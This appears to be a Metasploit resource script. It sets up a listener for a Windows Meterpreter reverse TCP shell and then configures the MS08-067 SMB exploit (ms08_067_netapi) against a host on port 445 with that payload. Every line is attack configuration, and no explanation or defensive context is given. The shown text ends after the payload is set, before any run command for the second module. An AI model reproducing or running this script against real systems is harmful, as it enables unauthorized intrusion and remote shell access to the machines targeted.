use exploit/multi/handler
set LHOST 192.168.1.164
set LPORT 7777
set payload windows/meterpreter/reverse_tcp
exploit -j -z
setg DisablePayloadHandler 1
use exploit/windows/smb/ms08_067_netapi
set LHOST 192.168.1.164
set LPORT 7777
set RHOST 192.168.1.164
set RPORT 445
set payload windows/meterpreter/reverse_tcp
